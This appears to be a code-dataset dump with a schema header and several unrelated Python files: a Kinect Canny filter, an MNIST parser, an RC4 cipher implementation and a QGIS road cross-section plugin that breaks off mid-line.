hexsha
stringlengths
40
40
size
int64
6
782k
ext
stringclasses
7 values
lang
stringclasses
1 value
max_stars_repo_path
stringlengths
4
237
max_stars_repo_name
stringlengths
6
72
max_stars_repo_head_hexsha
stringlengths
40
40
max_stars_repo_licenses
list
max_stars_count
int64
1
53k
max_stars_repo_stars_event_min_datetime
stringlengths
24
24
max_stars_repo_stars_event_max_datetime
stringlengths
24
24
max_issues_repo_path
stringlengths
4
184
max_issues_repo_name
stringlengths
6
72
max_issues_repo_head_hexsha
stringlengths
40
40
max_issues_repo_licenses
list
max_issues_count
int64
1
27.1k
max_issues_repo_issues_event_min_datetime
stringlengths
24
24
max_issues_repo_issues_event_max_datetime
stringlengths
24
24
max_forks_repo_path
stringlengths
4
184
max_forks_repo_name
stringlengths
6
72
max_forks_repo_head_hexsha
stringlengths
40
40
max_forks_repo_licenses
list
max_forks_count
int64
1
12.2k
max_forks_repo_forks_event_min_datetime
stringlengths
24
24
max_forks_repo_forks_event_max_datetime
stringlengths
24
24
content
stringlengths
6
782k
avg_line_length
float64
2.75
664k
max_line_length
int64
5
782k
alphanum_fraction
float64
0
1
9d82c9cb5024f9c9cf0bd3159b46b6ac35fd02c1
1,144
py
Python
src/preprocessing/CannyFilter.py
florianletsch/kinect-juggling
f320cc0b55adf65d338d25986a03106a7e3f46ef
[ "Unlicense", "MIT" ]
7
2015-11-27T09:53:32.000Z
2021-01-13T17:35:54.000Z
src/preprocessing/CannyFilter.py
florianletsch/kinect-juggling
f320cc0b55adf65d338d25986a03106a7e3f46ef
[ "Unlicense", "MIT" ]
null
null
null
src/preprocessing/CannyFilter.py
florianletsch/kinect-juggling
f320cc0b55adf65d338d25986a03106a7e3f46ef
[ "Unlicense", "MIT" ]
null
null
null
import numpy as np import cv, cv2 try: import vigra as vi except Exception, e: pass class CannyFilter(object): # def filter(self, rgb, depth, args = {}): # img = cv.fromarray(depth, cv.CV_8UC1) # mat1 = cv.CreateMat(img.rows, img.cols, cv.CV_8UC1) # mat2 = cv.CreateMat(img.rows, img.cols, cv.CV_8UC1) # cv.Convert(img, mat1) # cv.Canny(mat1, mat2, 50, 200) # ??? # return rgb, np.asarray(mat2) def filter(self, rgb, depth, balls, args = {}): img = np.asarray(depth) # img = cv.fromarray(depth, cv.CV_8UC1) # mat = cv.CreateMat(img.rows, img.cols, cv.CV_8UC1) # cv.Convert(img, mat) img = cv2.GaussianBlur(img,(3,3),0) # img = cv2.Canny(img,10,100,apertureSize=3) # cv.Canny(img,edges,0,300,aperture_size=3) im = vi.Image(img, dtype=np.uint8) edgels = vi.analysis.cannyEdgelList(im,3.0,3.0) # img = cv2.Canny(img, 50, 200) # rgb = cv2.cvtColor(img, cv.CV_GRAY2BGR) print edgels w, h = img.shape rgb = np.empty((w, h, 3), dtype=np.uint8) rgb[:, :, :] = img[:, :, np.newaxis] return rgb, depth, balls
27.902439
62
0.592657
9de8548126c0bb0004bd92da17ad48b3fbc94ad4
74
py
Python
pythonProj/FZPython/pyquant/libs/__init__.py
iHamburg/FZQuant
86b750ec33d01badfd3f324d6f1599118b9bf8ff
[ "MIT" ]
null
null
null
pythonProj/FZPython/pyquant/libs/__init__.py
iHamburg/FZQuant
86b750ec33d01badfd3f324d6f1599118b9bf8ff
[ "MIT" ]
null
null
null
pythonProj/FZPython/pyquant/libs/__init__.py
iHamburg/FZQuant
86b750ec33d01badfd3f324d6f1599118b9bf8ff
[ "MIT" ]
2
2019-04-10T10:05:00.000Z
2021-11-24T17:17:23.000Z
# coding: utf8 # from .loglib import logger # from .socketioclient import
18.5
29
0.756757
ae65f90e332bf1f2c4e825ef0bd9ca41429699ca
1,727
py
Python
data.py
asfer/mnist_sandbox
69be6d623e948afdf92a3ca4c7ce77f93eafc0a8
[ "MIT" ]
null
null
null
data.py
asfer/mnist_sandbox
69be6d623e948afdf92a3ca4c7ce77f93eafc0a8
[ "MIT" ]
null
null
null
data.py
asfer/mnist_sandbox
69be6d623e948afdf92a3ca4c7ce77f93eafc0a8
[ "MIT" ]
null
null
null
import array import struct import numpy as np from PIL import Image class MNIST: """ MNIST dataset is composed of digit images of size 28x28 and its labels """ def __init__(self, data_dir): self.train_data, self.train_labels = self.parse_images(data_dir + '/train-images-idx3-ubyte'), \ self.parse_labels(data_dir + '/train-labels-idx1-ubyte') self.test_data, self.test_labels = self.parse_images(data_dir + '/t10k-images-idx3-ubyte'), \ self.parse_labels(data_dir + '/t10k-labels-idx1-ubyte') @staticmethod def parse_images(filename): with open(filename, 'rb') as f: magic, items, rows, cols = struct.unpack('>IIII', f.read(16)) assert magic == 2051 and rows == 28 and cols == 28 images = array.array('B', f.read()) assert items * rows * cols == len(images) return np.array(images, dtype=np.int8).reshape((items, cols, rows), order='C') @staticmethod def parse_labels(filename): with open(filename, 'rb') as f: magic, items = struct.unpack('>II', f.read(8)) assert magic == 2049 labels = array.array('B', f.read()) assert len(labels) == items return np.array(labels, dtype=np.int8).reshape((items, 1)) @staticmethod def display(array): image = Image.fromarray(array) scaled_shape = tuple([8 * i for i in array.shape]) image = image.resize(scaled_shape) image.show() mnist = MNIST('./data') if __name__ == '__main__': example = mnist.train_data[41, :, :] print(example.shape) mnist.display(example)
34.54
105
0.588303
c9ba834056a8519b7c1744c6f2bf6724bc877345
61
py
Python
ex1/evento.py
renzon/oo-inpe
1b33939974f998badbeebd7bfe182070e77ef98f
[ "MIT" ]
null
null
null
ex1/evento.py
renzon/oo-inpe
1b33939974f998badbeebd7bfe182070e77ef98f
[ "MIT" ]
null
null
null
ex1/evento.py
renzon/oo-inpe
1b33939974f998badbeebd7bfe182070e77ef98f
[ "MIT" ]
null
null
null
class Evento(): def __init__(self, s): self.s = s
20.333333
26
0.540984
01165dc10d67af40d30bb37cc14258aed30e386a
1,766
py
Python
rc4.py
gamegrd/YY
39fca68d11956508fdbc094c9c319b7a7082722f
[ "Apache-2.0" ]
9
2016-10-17T04:57:47.000Z
2021-03-08T15:50:03.000Z
rc4.py
SkyblueMr/YY
39fca68d11956508fdbc094c9c319b7a7082722f
[ "Apache-2.0" ]
1
2017-10-13T09:27:34.000Z
2017-10-13T09:27:34.000Z
rc4.py
SkyblueMr/YY
39fca68d11956508fdbc094c9c319b7a7082722f
[ "Apache-2.0" ]
6
2017-06-07T01:27:42.000Z
2020-02-10T04:08:51.000Z
import binascii import hexdump class RC4: def __init__(self, key = ""): if key: self._rc4_init(key) def _rc4_init(self, key): (self.x,self.y) = (0,0) key_len = len(key) if key_len > 256 or key_len < 1: raise IndexError, 'Invalid key length' + key_len self.state_array = [i for i in xrange(0,256)] #self.stat_array = range(0,256) for i in xrange(0,256): self.x = ((ord(key[i%key_len]) & 0xff) + self.state_array[i] + self.x) & 0xff self.state_array[i], self.state_array[self.x] = self.state_array[self.x], self.state_array[i] self.x = 0 def update(self, input): self.out = [] for i in xrange(0,len(input)): self.x = (self.x + 1) & 0xff self.y = (self.state_array[self.x] + self.y) & 0xff self.state_array[self.x], self.state_array[self.y] = self.state_array[self.y], self.state_array[self.x] self.out.append(chr((ord(input[i]) ^ self.state_array[(self.state_array[self.x] + self.state_array[self.y]) & 0xff]))) return "".join(self.out) if __name__ == '__main__': key = 'F091172542D066E5F848E4BEAD43ACE1' data = 'F91C884344E7D3D1BA8DAEBF6E55A0ED4A60313D34555048F22441102DCB352602FE8F1478773FBF58FBE6D1E6F56DFB87E1F5B55901F24738444BE32191977F9CDFCEAD18DCDE65021F3303CBC3EC0545C939AA02016E04315FEAF90F07C7BF4841A0C886279EAAC9F4AD78576A74' key = binascii.unhexlify(key) data = binascii.unhexlify(data) rc4 = RC4(key) hexdump.hexdump(rc4.update(data)) rc4 = RC4(key) hexdump.hexdump(rc4.update(data[:32])) hexdump.hexdump(rc4.update(data[32:])) rc4 = M2Crypto.RC4.RC4(key) hexdump.hexdump(rc4.update(data[:32])) hexdump.hexdump(rc4.update(data[32:]))
40.136364
235
0.656285
6d7bc5844acf310633bdacd59548fe19e1e887dd
28,982
py
Python
qdviewer/QDViewer.py
FlorianTimm/quer2qgis
4ff6542fa9d26e4e37170b3437408f00547b7efd
[ "MIT" ]
null
null
null
qdviewer/QDViewer.py
FlorianTimm/quer2qgis
4ff6542fa9d26e4e37170b3437408f00547b7efd
[ "MIT" ]
null
null
null
qdviewer/QDViewer.py
FlorianTimm/quer2qgis
4ff6542fa9d26e4e37170b3437408f00547b7efd
[ "MIT" ]
null
null
null
# -*- coding: utf-8 -*- """ /*************************************************************************** QDViewer A QGIS plugin Querschnittsdaten anzeigen Generated by Plugin Builder: http://g-sherman.github.io/Qgis-Plugin-Builder/ ------------------- begin : 2018-05-11 git sha : $Format:%H$ copyright : (C) 2018 by Lehmkuhl/Timm email : [email protected] ***************************************************************************/ /*************************************************************************** * * * This program is free software; you can redistribute it and/or modify * * it under the terms of the GNU General Public License as published by * * the Free Software Foundation; either version 2 of the License, or * * (at your option) any later version. * * * ***************************************************************************/ """ from PyQt5.QtCore import QSettings, QTranslator, qVersion, QCoreApplication, QVariant from PyQt5.QtGui import QIcon from qgis.gui import QgsFileWidget from qgis.core import QgsVectorLayer, QgsField, QgsProject, QgsFeature, QgsPointXY, QgsGeometry, QgsPoint, \ QgsCoordinateReferenceSystem, QgsVectorFileWriter from PyQt5.QtWidgets import QAction import sqlite3 import math import time # Initialize Qt resources from file resources.py from .resources import * # Import the code for the dialog from .QDViewer_dialog import QDViewerDialog import os.path class QDViewer: """QGIS Plugin Implementation.""" def __init__(self, iface): """Constructor. :param iface: An interface instance that will be passed to this class which provides the hook by which you can manipulate the QGIS application at run time. :type iface: QgsInterface """ # Save reference to the QGIS interface self.iface = iface # initialize plugin directory self.plugin_dir = os.path.dirname(__file__) # initialize locale locale = QSettings().value('locale/userLocale')[0:2] locale_path = os.path.join( self.plugin_dir, 'i18n', 'QDViewer_{}.qm'.format(locale)) if os.path.exists(locale_path): self.translator = QTranslator() self.translator.load(locale_path) if qVersion() > '4.3.3': QCoreApplication.installTranslator(self.translator) # Create the dialog (after translation) and keep reference self.dlg = QDViewerDialog() # Declare instance attributes self.actions = [] self.menu = self.tr(u'&QDViewer') self.toolbar = self.iface.addToolBar(u'QDViewer') self.toolbar.setObjectName(u'QDViewer') self.achsen = None self.achsenData = None self.querschnitte = None self.querschnittData = None # noinspection PyMethodMayBeStatic def tr(self, message): """Get the translation for a string using Qt translation API. We implement this ourselves since we do not inherit QObject. :param message: String for translation. :type message: str, QString :returns: Translated version of message. :rtype: QString """ # noinspection PyTypeChecker,PyArgumentList,PyCallByClass return QCoreApplication.translate('QDViewer', message) def add_action(self, icon_path, text, callback, enabled_flag=True, add_to_menu=True, add_to_toolbar=True, status_tip=None, whats_this=None, parent=None): """Add a toolbar icon to the toolbar. :param icon_path: Path to the icon for this action. Can be a resource path (e.g. ':/plugins/foo/bar.png') or a normal file system path. :type icon_path: str :param text: Text that should be shown in menu items for this action. :type text: str :param callback: Function to be called when the action is triggered. :type callback: function :param enabled_flag: A flag indicating if the action should be enabled by default. Defaults to True. :type enabled_flag: bool :param add_to_menu: Flag indicating whether the action should also be added to the menu. Defaults to True. :type add_to_menu: bool :param add_to_toolbar: Flag indicating whether the action should also be added to the toolbar. Defaults to True. :type add_to_toolbar: bool :param status_tip: Optional text to show in a popup when mouse pointer hovers over the action. :type status_tip: str :param parent: Parent widget for the new action. Defaults None. :type parent: QWidget :param whats_this: Optional text to show in the status bar when the mouse pointer hovers over the action. :returns: The action that was created. Note that the action is also added to self.actions list. :rtype: QAction """ icon = QIcon(icon_path) action = QAction(icon, text, parent) action.triggered.connect(callback) action.setEnabled(enabled_flag) if status_tip is not None: action.setStatusTip(status_tip) if whats_this is not None: action.setWhatsThis(whats_this) if add_to_toolbar: self.toolbar.addAction(action) if add_to_menu: self.iface.addPluginToMenu( self.menu, action) self.actions.append(action) return action def initGui(self): """Create the menu entries and toolbar icons inside the QGIS GUI.""" icon_path = ':/plugins/QDViewer/icon.png' self.add_action( icon_path, text=self.tr(u'QDViewer'), callback=self.run, parent=self.iface.mainWindow()) def unload(self): """Removes the plugin menu item and icon from QGIS GUI.""" for action in self.actions: self.iface.removePluginMenu( self.tr(u'&QDViewer'), action) self.iface.removeToolBarIcon(action) # remove the toolbar del self.toolbar @staticmethod def sqrt(t): return math.sqrt(t) # Vektor berechnen @staticmethod def dist(p_x1, p_x2, p_y1, p_y2): p_dx = p_x2 - p_x1 p_dy = p_y2 - p_y1 return QDViewer.einheit(p_dx, p_dy) # Einheitsvektor berechnen @staticmethod def einheit(p_dx, p_dy): p_strecke = math.sqrt(p_dx * p_dx + p_dy * p_dy) if p_strecke > 0: p_dx = p_dx / p_strecke p_dy = p_dy / p_strecke return p_dx, p_dy, p_strecke # Polygon schreiben def write_polygon(self, p_x, p_y, row, quer): feat = QgsFeature(self.querschnitte.fields()) feat.setAttributes([row[0], row[1], quer[0], quer[1], quer[2], quer[3], quer[8], quer[9], quer[10], quer[11], quer[12], quer[13], quer[14], quer[15]]) if len(p_x) > 0: points = [] for i in range(len(p_x)): points.append(QgsPointXY(p_x[i], p_y[i])) feat.setGeometry(QgsGeometry.fromPolygonXY([points])) self.querschnittData.addFeatures([feat]) # text = "POLYGON ((" # for i in range(len(p_x)): # text += str(p_x[i]) + " " + str(p_y[i]) + ", " # if len(p_x) > 0: # text = text[:-2] # text += ")); " + str(row[0]) + "; " + str(row[1]) + "; " + str(quer[0]) + "; " + str(quer[1]) + "; " + \ # str(quer[2]) + "; " + str(quer[3]) + "; " + str(quer[4]) + "; " + str(quer[5]) + "; " + \ # str(quer[6]) + "; " + str(quer[7]) + "; " + str(quer[8]) # print(text) # self.txt.write(text + "\n") def write_linestring(self, p_punkte, row): feat = QgsFeature(self.achsen.fields()) feat.setAttributes([row[0], row[1]]) if len(p_punkte) > 0: points = [] for p_p in p_punkte: points.append(QgsPointXY(p_p[1], p_p[2])) feat.setGeometry(QgsGeometry.fromPolylineXY(points)) self.achsenData.addFeatures([feat]) # text = "LINESTRING (" # for p_p in p_punkte: # text += str(p_p[1]) + " " + str(p_p[2]) + ", " # if len(p_punkte) > 0: # text = text[:-2] # text += "); " + str(row[0]) + "; " + str(row[1]) # print(text) # self.txt2.write(text + "\n") # Normalisiert Vektoren @staticmethod def norm(p_dx, p_dy): p_s = math.sqrt(p_dx * p_dx + p_dy * p_dy) if p_s > 0: p_dx = p_dx / p_s p_dy = p_dy / p_s return p_dx, p_dy, p_s def make_layers(self): # WKT-Dateien anlegen # self.txt = open(self.dlg.fw_speichern.filePath(), "w") # self.txt.write("Geometrie; VNK; NNK; VST; BST; STREIFEN; STREIFENNR; ABSTAND_VST1; " + # "ABSTAND_VST2; ABSTAND_BST1; ABSTAND_BST2; ART\n") # self.txt2 = open(self.dlg.fw_speichern.filePath() + "_achsen.wkt", "w") # self.txt2.write("Geometrie; VNK; NNK\n") # from qgis.core import QgsMapLayerRegistry self.querschnitte = QgsVectorLayer("polygon?crs=epsg:25832", "Querschnitte", "memory") self.querschnitte.startEditing() self.querschnittData = self.querschnitte.dataProvider() self.querschnittData.addAttributes([QgsField("VNK", QVariant.String), QgsField("NNK", QVariant.String), QgsField("VST", QVariant.Int), QgsField("BST", QVariant.Int), QgsField("STREIFEN", QVariant.String), QgsField("STREIFENNR", QVariant.Int), QgsField("ART", QVariant.String), QgsField("ARTOBER", QVariant.String), QgsField("BREITE", QVariant.Int), QgsField("BISBREITE", QVariant.Int), QgsField("BLPART", QVariant.String), QgsField("BLPART3", QVariant.String), QgsField("UIPART", QVariant.String), QgsField("UIPART3", QVariant.String), QgsField("LAENGE", QVariant.Int), QgsField("FLAECHE", QVariant.Double), QgsField("BAUJAHRGEW", QVariant.Date), QgsField("ABNAHMEGEW", QVariant.Date), QgsField("DAUERGEW", QVariant.Int), QgsField("ABLAUFGEW", QVariant.Date), QgsField("ERFART", QVariant.String), QgsField("QUELLE", QVariant.String), QgsField("ADATUM", QVariant.Date), QgsField("BEMERKUNG", QVariant.String), QgsField("BEARBEITER", QVariant.String), QgsField("STAND", QVariant.Date), QgsField("PARENTID", QVariant.String), QgsField("OBJEKTID", QVariant.String), QgsField("FLAG", QVariant.String)]) self.querschnitte.commitChanges() QgsProject.instance().addMapLayer(self.querschnitte) self.achsen = QgsVectorLayer("linestring?crs=epsg:25832", "Achsen", "memory") self.achsen.startEditing() self.achsenData = self.achsen.dataProvider() self.achsenData.addAttributes([QgsField("VNK", QVariant.String), QgsField("NNK", QVariant.String)]) # self.achsen.commitChanges() QgsProject.instance().addMapLayer(self.achsen) def arbeite(self): # QgsVectorFileWriter.writeAsVectorFormat(vlyr, newSQLiteFilePath, "utf-8", crs, "SQLite", False, None, # ["SPATIALITE=YES"]) self.make_layers() print("Connect DB and copy...") dbabschn = QgsVectorLayer(self.dlg.fw_abschn.filePath(), "dbabschn", "ogr") db1030 = QgsVectorLayer(self.dlg.fw_1030.filePath(), "db1030", "ogr") db255 = QgsVectorLayer(self.dlg.fw_255.filePath(), "db255", "ogr") QgsVectorFileWriter.writeAsVectorFormat(dbabschn, self.dlg.fw_speichern.filePath()+"\dbabschn.sqlite", "utf-8", QgsCoordinateReferenceSystem(), "SQLite") QgsVectorFileWriter.writeAsVectorFormat(db255, self.dlg.fw_speichern.filePath()+"\db000255.sqlite", "utf-8", QgsCoordinateReferenceSystem(), "SQLite") QgsVectorFileWriter.writeAsVectorFormat(db1030, self.dlg.fw_speichern.filePath()+"\db001030.sqlite", "utf-8", QgsCoordinateReferenceSystem(), "SQLite") mem_db = sqlite3.connect(':memory:') # create a memory database for old_db_pfad in [self.dlg.fw_speichern.filePath() + "\dbabschn.sqlite", self.dlg.fw_speichern.filePath() + "\db000255.sqlite", self.dlg.fw_speichern.filePath() + "\db001030.sqlite"]: old_db = sqlite3.connect(old_db_pfad) c = old_db.cursor() c.execute('''DROP TABLE geometry_columns''') c.execute('''DROP TABLE spatial_ref_sys''') query = "".join(line for line in old_db.iterdump()) mem_db.executescript(query) daten = mem_db.cursor() mem_db.create_function("sqrt", 1, QDViewer.sqrt) print("Tabellen anlegen...") daten.execute('''CREATE TABLE "tmp11" ("VNK" varchar(10), "NNK" varchar(10), "SORT" float, "XKOORD" float, "YKOORD" float, "STAND" text, "FLAG" varchar(1), DX float default 0, DY float default 0, laenge float default NULL, STATION float default NULL, ABSTAND float default NULL)''') daten.execute('''CREATE TABLE "tmp12" ("VNK" varchar(10), "NNK" varchar(10), "SORT" float, "XKOORD" float, "YKOORD" float, "STAND" text, "FLAG" varchar(1), DX float default 0, DY float default 0, laenge float default NULL, STATION float default NULL, ABSTAND float default NULL)''') daten.execute('''CREATE TABLE "tmp13" ("VNK" varchar(10), "NNK" varchar(10), "SORT" float, "XKOORD" float, "YKOORD" float, "STAND" text, "FLAG" varchar(1), DX float default 0, DY float default 0, laenge float default NULL, STATION float default NULL, ABSTAND float default NULL)''') daten.execute('''CREATE TABLE "tmp14" ("VNK" varchar(10), "NNK" varchar(10), "SORT" float, "XKOORD" float, "YKOORD" float, "STAND" text, "FLAG" varchar(1), DX float default 0, DY float default 0, laenge float default NULL, STATION float default NULL, ABSTAND float default NULL, DXP float default 0, DYP float default 0)''') # DX/DY berechnen print("DX/DY berechnen...") daten.execute('''INSERT INTO tmp11 SELECT a.VNK, a.NNK, a.SORT, a.XKOORD, a.YKOORD, a.STAND, a.FLAG, (b.XKOORD - a.XKOORD) DX, (b.YKOORD - a.YKOORD) DY, NULL, NULL, NULL FROM DB000255 a, DB000255 b WHERE a.VNK = b.VNK AND a.NNK = b.NNK AND a.SORT = (b.SORT + 1);''') # Laenge berechnen und Vektor DX/DY zu Einheitsvektor print("Laenge berechnen und Vektor DX/DY zu Einheitsvektor...") daten.execute('''UPDATE tmp11 SET laenge = sqrt(DX*DX+DY*DY), DX = DX / sqrt(DX*DX+DY*DY), DY = DY / sqrt(DX*DX+DY*DY) WHERE DX != 0 OR DY != 0;''') # DX/DY vom zweiten Punkt für ersten übernehmen print("DX/DY vom zweiten Punkt für ersten übernehmen...") daten.execute('''INSERT INTO tmp11 SELECT a.VNK, a.NNK, a.SORT, a.XKOORD, a.YKOORD, a.STAND, a.FLAG, b.DX DX, b.DY DY, 0, 0, 0 FROM DB000255 a, tmp11 b WHERE a.VNK = b.VNK AND a.NNK = b.NNK AND a.SORT = 1 AND b.SORT = 2;''') # ABSTAND berechnen (Summe der Laenge) print("ABSTAND berechnen (Summe der Laenge)...") daten.execute('''INSERT INTO tmp12 SELECT a.VNK, a.NNK, a.SORT, a.XKOORD, a.YKOORD, a.STAND, a.FLAG, a.DX, a.DY, a.laenge, NULL, SUM(b.laenge) FROM tmp11 a, tmp11 b WHERE a.VNK = b.VNK AND a.NNK = b.NNK AND a.SORT >= b.SORT GROUP BY a.VNK, a.NNK, a.SORT;''') # Station berechnen print("Station berechnen...") daten.execute('''INSERT INTO tmp13 SELECT a.VNK, a.NNK, a.SORT, a.XKOORD, a.YKOORD, a.STAND, a.FLAG, a.DX, a.DY, a.laenge, a.ABSTAND * b.faktor , a.ABSTAND FROM tmp12 a, (SELECT b.VNK, b.NNK, c.LEN / max(b.ABSTAND) faktor FROM tmp12 b, DBABSCHN c WHERE b.VNK = c.VNK AND b.NNK = c.NNK GROUP BY b.VNK, b.NNK) b WHERE a.VNK = b.VNK AND a.NNK = b.NNK GROUP BY a.VNK, a.NNK, a.SORT;''') # DXP/DYP berechnen (Verschiebe-Vektor an Stützpunkten) print("DXP/DYP berechnen (Verschiebe-Vektor an Stützpunkten)...") daten.execute('''INSERT INTO tmp14 SELECT a.*, a.DX + b.DX, a.DY + b.DY FROM tmp13 a, tmp13 b WHERE a.VNK = b.VNK AND a.NNK = b.NNK AND a.SORT = (b.SORT - 1);''') # Letzten Punkt übernehmen print("Letzten Punkt übernehmen...") daten.execute('''INSERT INTO tmp14 SELECT a.*, a.DX, a.DY FROM tmp13 a, (SELECT VNK, NNK, max(SORT) SORT FROM tmp13 GROUP BY VNK, NNK) b WHERE a.VNK = b.VNK AND a.NNK = b.NNK AND a.SORT = b.SORT;''') # DXP/DYP zu Einheitsvektor print("DXP/DYP zu Einheitsvektor...") daten.execute('''UPDATE tmp14 SET DXP = DXP / sqrt(DXP*DXP+DYP*DYP), DYP = DYP / sqrt(DXP*DXP+DYP*DYP) WHERE DXP != 0 OR DYP != 0;''') mem_db.commit() print("Querschnitte summieren:") print("Tabellen anlegen...") daten.execute('''CREATE TABLE tmp1 ("VNK" varchar(10), "NNK" varchar(10), "VST" float, "BST" float, "STREIFEN" varchar(1), "STREIFENNR" float, "ART" varchar(3), "ARTOBER" varchar(3), "BREITE" float, "BISBREITE" float, "BLPART" varchar(2), "BLPART3" varchar(5), "UIPART" varchar(2), "UIPART3" varchar(5), "LAENGE" float, "FLAECHE" float, "BAUJAHRGEW" text, "ABNAHMEGEW" text, "DAUERGEW" float, "ABLAUFGEW" text, "ERFART" varchar(2), "QUELLE" varchar(2), "ADATUM" text, "BEMERKUNG" varchar(254), "BEARBEITER" varchar(64), "STAND" text, "PARENTID" varchar(32), "OBJEKTID" varchar(32), "FLAG" varchar(1), ABSTAND_VST1 float default 0, ABSTAND_VST2 float default 0, ABSTAND_BST1 float default 0, ABSTAND_BST2 float default 0);''') daten.execute('''CREATE TABLE tmp2 ("VNK" varchar(10), "NNK" varchar(10), "VST" float, "BST" float, "STREIFEN" varchar(1), "STREIFENNR" float, "ART" varchar(3), "ARTOBER" varchar(3), "BREITE" float, "BISBREITE" float, "BLPART" varchar(2), "BLPART3" varchar(5), "UIPART" varchar(2), "UIPART3" varchar(5), "LAENGE" float, "FLAECHE" float, "BAUJAHRGEW" text, "ABNAHMEGEW" text, "DAUERGEW" float, "ABLAUFGEW" text, "ERFART" varchar(2), "QUELLE" varchar(2), "ADATUM" text, "BEMERKUNG" varchar(254), "BEARBEITER" varchar(64), "STAND" text, "PARENTID" varchar(32), "OBJEKTID" varchar(32), "FLAG" varchar(1), ABSTAND_VST1 float default 0, ABSTAND_VST2 float default 0, ABSTAND_BST1 float default 0, ABSTAND_BST2 float default 0);''') print("Summe links und rechts...") daten.execute('''INSERT INTO tmp1 SELECT a.VNK, a.NNK, a.VST, a.BST, a.STREIFEN, a.STREIFENNR, a.ART, a.ARTOBER, a.BREITE, a.BISBREITE, a.BLPART, a.BLPART3, a.UIPART, a.UIPART3, a.LAENGE, a.FLAECHE, a.BAUJAHRGEW, a.ABNAHMEGEW, a.DAUERGEW, a.ABLAUFGEW, a.ERFART, a.QUELLE, a.ADATUM, a.BEMERKUNG, a.BEARBEITER, a.STAND, a.PARENTID, a.OBJEKTID, a.FLAG, (SUM(b.BREITE)) ABSTAND_VST1, NULL, (SUM(b.BISBREITE)) ABSTAND_BST1, NULL FROM DB001030 a, DB001030 b WHERE a.VNK = b.VNK AND b.NNK = a.NNK AND a.VST = b.VST AND a.STREIFEN = b.STREIFEN AND a.STREIFENNR > b.STREIFENNR and a.STREIFEN != "M" GROUP BY a.VNK, a.NNK, a.VST, a.STREIFEN, a.STREIFENNR;''') print("Streifen 1 kopieren...") daten.execute('''INSERT INTO tmp1 SELECT VNK, NNK, VST,BST, STREIFEN, STREIFENNR, ART, ARTOBER, BREITE, BISBREITE, BLPART, BLPART3, UIPART, UIPART3, LAENGE, FLAECHE, BAUJAHRGEW, ABNAHMEGEW, DAUERGEW, ABLAUFGEW, ERFART, QUELLE, ADATUM, BEMERKUNG, BEARBEITER, STAND, PARENTID, OBJEKTID, FLAG, 0 ABSTAND_VST1, NULL ABSTAND_VST2, 0 ABSTAND_BST1, NULL ABSTAND_BST2 FROM DB001030 WHERE STREIFENNR = 1;''') print("Mittelstreifen addieren...") daten.execute('''INSERT INTO tmp2 SELECT a.VNK, a.NNK, a.VST,a.BST,a.STREIFEN,a.STREIFENNR,a.ART,a.ARTOBER,a.BREITE,a.BISBREITE,a.BLPART, a.BLPART3, a.UIPART,a.UIPART3,a.LAENGE,a.FLAECHE,a.BAUJAHRGEW,a.ABNAHMEGEW,a.DAUERGEW,a.ABLAUFGEW,a.ERFART, a.QUELLE, a.ADATUM, a.BEMERKUNG,a.BEARBEITER,a.STAND,a.PARENTID,a.OBJEKTID,a.FLAG, (a.ABSTAND_VST1+round(IFNULL(m.BREITE,0) / 2)) ABSTAND_VST1, NULL ABSTAND_VST2, (a.ABSTAND_BST1+round(IFNULL(m.BISBREITE,0) / 2)) ABSTAND_BST1, NULL ABSTAND_BST2 FROM tmp1 a left join (select * from DB001030 where STREIFEN = "M") m on a.VNK = m.VNK AND a.NNK = m.NNK AND a.VST = m.VST;''') print("Abstand der Außenkante berechnen...") daten.execute('''UPDATE tmp2 SET ABSTAND_VST2 = ABSTAND_VST1 + BREITE, ABSTAND_BST2 = ABSTAND_BST1 + BISBREITE;''') print("Linke drehen...") daten.execute('''UPDATE tmp2 SET ABSTAND_VST1 = - ABSTAND_VST1, ABSTAND_VST2 = - ABSTAND_VST2, ABSTAND_BST1 = - ABSTAND_BST1, ABSTAND_BST2 = - ABSTAND_BST2 WHERE STREIFEN = "L";''') print("Mittelstreifen berechnen...") daten.execute('''INSERT INTO tmp2 SELECT VNK, NNK, VST, BST, STREIFEN, STREIFENNR, ART, ARTOBER, BREITE, BISBREITE, BLPART, BLPART3, UIPART, UIPART3, LAENGE, FLAECHE, BAUJAHRGEW, ABNAHMEGEW, DAUERGEW, ABLAUFGEW, ERFART, QUELLE, ADATUM, BEMERKUNG, BEARBEITER, STAND, PARENTID, OBJEKTID, FLAG, ROUND(- BREITE / 2) ABSTAND_VST1, ROUND(BREITE / 2) ABSTAND_VST2, ROUND(- BISBREITE / 2) ABSTAND_BST1, ROUND(BISBREITE / 2) ABSTAND_BST2 FROM DB001030 WHERE STREIFEN = "M";''') print("Nicht benötigte Tabellen löschen...") daten.execute('''DROP TABLE tmp11''') daten.execute('''DROP TABLE tmp12''') daten.execute('''DROP TABLE tmp13''') daten.execute('''DROP TABLE tmp1''') mem_db.commit() print("Arbeiten...") # Abschnitte selektieren und durchgehen daten.execute('SELECT VNK, NNK, LEN FROM DBABSCHN') abschn = daten.fetchall() for row in abschn: # Koordinaten der Achse abfragen sql = 'SELECT STATION, XKOORD, YKOORD, DXP, DYP, DX, DY FROM tmp14 WHERE VNK = "' + row[0] + '" AND ' \ 'NNK = "' + row[1] + '" AND STATION IS NOT NULL AND XKOORD IS NOT NULL AND YKOORD IS NOT NULL AND ' \ 'DX IS NOT NULL AND DY IS NOT NULL ORDER BY SORT' daten.execute(sql) punkte = daten.fetchall() # Achse als WKT ablegen self.write_linestring(punkte, row) # Querschnitte laden sql = 'SELECT VST, BST, STREIFEN, STREIFENNR, ABSTAND_VST1, ABSTAND_VST2, ABSTAND_BST1, ABSTAND_BST2,' + \ ' ART,ARTOBER, BREITE, BISBREITE, BLPART, BLPART3, UIPART, UIPART3, LAENGE, FLAECHE, BAUJAHRGEW,' + \ 'ABNAHMEGEW, DAUERGEW, ABLAUFGEW, ERFART, QUELLE, ADATUM, BEMERKUNG, BEARBEITER, STAND, PARENTID, ' \ 'OBJEKTID, FLAG FROM tmp2 WHERE VNK = "' + row[0] + '" AND NNK = "' + row[1] + '" AND ' + \ 'ABSTAND_VST1 IS NOT NULL AND ABSTAND_VST2 IS NOT NULL AND ABSTAND_BST1 IS NOT NULL AND ' \ 'ABSTAND_BST2 IS NOT NULL ORDER BY VST, STREIFEN, STREIFENNR' daten.execute(sql) for quer in daten.fetchall(): # print(quer) x = [] y = [] c = 0 pa = None for p in punkte: if p[0] >= quer[0] and c == 0 and pa is not None: # Berechnung Anfangspunkt dx = p[1] - pa[1] dy = p[2] - pa[2] diff = p[0] - pa[0] f = 0 if diff > 0: f = (quer[0] - pa[0]) / diff # print(f) dxn, dyn, s = QDViewer.norm(dx, 